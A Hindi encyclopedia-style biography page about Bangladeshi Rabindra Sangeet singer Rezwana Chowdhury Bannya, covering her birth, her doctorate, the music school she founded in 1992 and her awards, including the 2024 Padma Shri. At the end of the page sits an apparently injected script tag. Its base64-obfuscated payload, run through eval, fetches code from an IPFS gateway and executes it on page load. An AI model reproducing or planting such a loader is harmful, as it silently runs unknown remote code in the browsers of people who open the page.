रेज़वाना चौधरी बन्न्या

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें
रेज़वाना चौधरी बन्न्या
रेज़वाना चौधरी बन्न्या
पूरा नाम रेज़वाना चौधरी बन्न्या
जन्म 13 जनवरी, 1957
जन्म भूमि रंगपुर, बांग्लादेश
अभिभावक माता- इस्मत आरा खान

पिता- मज़हरुद्दीन खान

कर्म भूमि बांग्लादेश
पुरस्कार-उपाधि पद्म श्री (2024), भारत सरकार

बंग भूषण (2017), पश्चिम बंगाल सरकार
संगीत सम्मान पुरस्कार, (2013), संस्कृति मंत्रालय, भारत
स्वतंत्रता दिवस पुरस्कार (2016)

प्रसिद्धि रवीन्द्र संगीत गायिका

रेज़वाना चौधरी बन्न्या (अंग्रेज़ी: Rezwana Chowdhury Bannya, जन्म- 13 जनवरी, 1957) प्रसिद्ध रवीन्द्र संगीत गायिका हैं जो भारत के पड़ौसी देश बांग्लादेश से हैं। भारत सरकार ने उन्हें साल 2024 में पद्म श्री से सम्मानित किया है, जिससे इस बांग्लादेशी गायिका के शानदार कॅरियर में एक और उपलब्धि जुड़ गई। रेज़वाना चौधरी बन्न्या को कला के क्षेत्र में उनके विशिष्ट योगदान के लिए यह पुरस्कार मिला है।

परिचय

रेज़वाना चौधरी बन्न्या का जन्म 13 जनवरी, 1957 को रंगपुर, बांग्लादेश में हुआ। उनके पिता का नाम मज़हरुद्दीन खान और माता का नाम इस्मत आरा खान है।

शिक्षा

उनकी प्रारंभिक गायन शिक्षा उनके चाचा अब्दुल अली के साथ शुरू हुई। साल 2021 में उन्होंने ढाका विश्वविद्यालय में रवीन्द्र संगीत पर अपना शोध पूरा किया, जिसके लिए उन्हें डॉक्टर ऑफ फिलॉसफी की डिग्री प्राप्त हुई।

'शुरेर धारा' की स्थापना

रेज़वाना चौधरी बन्न्या ढाका विश्वविद्यालय में नृत्य विभाग की प्रोफेसर और संस्थापक अध्यक्ष हैं। पहले वह उसी विश्वविद्यालय में संगीत विभाग में प्रोफेसर थीं। कनिका बंद्योपाध्याय से प्रेरित होकर उन्होंने 1992 में ढाका में एक प्रतिष्ठित संगीत विद्यालय 'शुरेर धारा' की स्थापना की थी।

सम्मान व पुरस्कार

  1. भारत सरकार द्वारा पद्म श्री (2024)
  2. पश्चिम बंगाल सरकार द्वारा बंग भूषण (2017)
  3. फ़िरोज़ा बेगम मेमोरियल गोल्ड मेडल (2017)
  4. पश्चिम बंगाल सरकार द्वारा संगीत महा सम्मान (2017)
  5. स्वतंत्रता दिवस पुरस्कार (2016)
  6. संगीत सम्मान पुरस्कार, संस्कृति मंत्रालय, भारत (2013)
  7. आनंद संगीत पुरस्कार (2002)


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>